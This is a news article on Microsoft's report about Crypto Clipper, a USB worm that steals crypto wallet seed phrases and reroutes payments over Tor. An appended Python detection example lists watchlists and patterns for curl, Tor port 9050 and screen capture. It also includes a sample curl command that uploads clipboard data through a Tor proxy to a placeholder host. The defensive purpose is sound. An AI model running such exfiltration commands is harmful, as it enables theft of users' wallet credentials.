
Microsoft warns of USB worm targeting cryptocurrency wallets

Microsoft says Crypto Clipper spreads through USB drives, steals wallet data and can reroute payments to attacker-controlled addresses.


By James Whitfield · Staff Writer


Photo: Ars Technica

Microsoft has detected a new USB-spreading malware strain aimed at stealing cryptocurrency credentials and redirecting payments. The company said the malware, which it calls Crypto Clipper, combines clipboard theft, screenshots and Tor-routed communications in a small tool that can also give attackers continued access to compromised devices.

In a security report published Thursday, Microsoft said Crypto Clipper watches a device's clipboard for text that resembles cryptocurrency wallet addresses or seed phrases. Seed phrases are the 12- or 24-word recovery strings used to regain access to many crypto wallets.

When the malware finds those patterns, Microsoft said, it sends the captured data to infrastructure controlled by the attacker. It also takes five screenshots over 10 seconds and uploads them, which Microsoft said may help attackers understand the context around the stolen information.

How the malware spreads

Microsoft said it observed Crypto Clipper moving through Windows shortcut files, known as .lnk files, on USB drives. When an infected drive is connected to a device, the code checks whether the malware is already present; if not, it downloads the malware through a Tor connection, according to Microsoft.

The company said the worm also tries to reduce obvious signs of infection on the removable drive. Microsoft said it scans the USB device and gives the shortcut files names that resemble other files on the drive.

Crypto Clipper routes stolen data through Tor using a local SOCKS5 proxy, according to Microsoft. Tor is designed to obscure the path between sender and receiver by moving traffic through multiple nodes, while SOCKS5 is a proxy protocol that relays an application's traffic through an intermediary before it reaches its destination.

Microsoft said that design makes the malware notable because it does not rely on a standard installer or exposed command-and-control servers tied to visible IP addresses. The company described the result as a financially motivated stealer that also functions as a lightweight backdoor.

Wallet theft and redirection

Beyond stealing seed phrases, Crypto Clipper can alter cryptocurrency addresses copied to the clipboard, Microsoft said. If a user copies a legitimate wallet address before sending funds, the malware can replace it with an address controlled by the attacker.

That gives the attacker two paths to profit, according to Microsoft: stealing wallet recovery information and diverting transactions before they are sent. Microsoft said the malware’s remote code execution capability also gives attackers a way to run additional commands after infection.

Microsoft said the threat shows how script-based stealers can have a broad effect when paired with anonymized communications and live tasking. The company pointed to Tor-routed command-and-control traffic, clipboard monitoring, screenshots and remote execution as the key parts of the operation.

Detection signs

Microsoft said Defender for Endpoint flags Crypto Clipper activity as suspicious JavaScript processes and possible data exfiltration using Curl. Microsoft Defender Antivirus detects it as Trojan:Win32/CryptoBandits.A, according to the company.

Microsoft listed several broader warning signs for defenders, including script interpreters launching unusual child processes, proxy use on localhost port 9050, PowerShell commands that capture screens, and evidence of clipboard inspection or cryptocurrency address substitution.
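To show how the warning signs listed above translate into a concrete triage rule, here is a small Python detection pass over process-creation events. This is an added example, not code from Microsoft or from the Ars Technica report. The log format (`parent=… image=… cmdline=…`), the interpreter and child-process watchlists, and the use of the .NET `CopyFromScreen` call as the screen-capture indicator are all assumptions; the sample events are constructed for the example and do not come from a real incident.

```python
"""Toy detection pass over constructed process-creation events.

It flags three of the warning signs Microsoft lists for Crypto Clipper:
  - a script interpreter launching an unusual child process,
  - a command line that points at a SOCKS proxy on localhost port 9050
    (the default Tor SOCKS port),
  - PowerShell invoking a screen-capture API.
Log format, watchlists and field names are assumptions for this example.
"""
import re
from dataclasses import dataclass

# Assumed watchlists; a real deployment would tune these to its own baseline.
SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "mshta.exe",
                       "powershell.exe", "pwsh.exe"}
UNUSUAL_CHILDREN = {"curl.exe", "certutil.exe", "bitsadmin.exe",
                    "powershell.exe", "pwsh.exe"}

# 127.0.0.1 or localhost on port 9050, optionally with a socks5:// scheme.
TOR_SOCKS_RE = re.compile(
    r"(?:socks5h?://)?(?:127\.0\.0\.1|localhost):9050\b", re.IGNORECASE)
# .NET screen-capture call commonly reached from PowerShell (assumed indicator).
SCREEN_CAPTURE_RE = re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap",
                               re.IGNORECASE)


@dataclass
class ProcEvent:
    parent: str   # basename of the parent image, lower-cased
    image: str    # basename of the created process image, lower-cased
    cmdline: str  # raw command line


def _basename(path: str) -> str:
    """Reduce a Windows path or bare name to its lower-cased file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one assumed-format line: parent=<img> image=<img> cmdline=<rest>."""
    m = re.match(r"parent=(\S+)\s+image=(\S+)\s+cmdline=(.*)$", line.strip())
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    return ProcEvent(_basename(m.group(1)), _basename(m.group(2)), m.group(3))


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of warning-sign labels that apply to one event."""
    findings = []
    if ev.parent in SCRIPT_INTERPRETERS and ev.image in UNUSUAL_CHILDREN:
        findings.append("script-interpreter-spawned-unusual-child")
    if TOR_SOCKS_RE.search(ev.cmdline):
        findings.append("localhost-9050-socks-proxy")
    if ev.image in {"powershell.exe", "pwsh.exe"} and SCREEN_CAPTURE_RE.search(ev.cmdline):
        findings.append("powershell-screen-capture")
    return findings


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (line, findings) for every event that triggers at least one sign."""
    hits = []
    for line in lines:
        findings = classify(parse_event(line))
        if findings:
            hits.append((line, findings))
    return hits


# Constructed sample events (not real telemetry). The first and third are
# shaped like the activity described in the article; the others are benign.
SAMPLE_EVENTS = [
    r"parent=C:\Windows\System32\wscript.exe image=C:\Windows\System32\curl.exe "
    r"cmdline=curl.exe --socks5-hostname 127.0.0.1:9050 http://placeholder.invalid/upload -T clip.txt",
    r"parent=C:\Windows\explorer.exe image=C:\Windows\System32\curl.exe "
    r"cmdline=curl.exe https://example.com/file.zip -o file.zip",
    r"parent=C:\Windows\System32\wscript.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'cmdline=powershell.exe -w hidden -c "Add-Type -AssemblyName System.Drawing; ... .CopyFromScreen(...)"',
    r"parent=C:\Windows\System32\svchost.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"cmdline=powershell.exe -NoProfile -Command Get-Process",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_EVENTS):
        print(", ".join(findings), "<-", line[:80])
```

Run as a script it prints the two constructed events that trip a rule and which rules they tripped. The labels are deliberately separate so that a single weak indicator (a curl download from Explorer, a benign PowerShell command) produces nothing, while the combination of an interpreter parent plus a localhost:9050 proxy or a screen-capture call stands out for review.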

The company’s report on Crypto Clipper is available on the Microsoft Security Blog.

This story draws on original reporting from Ars Technica.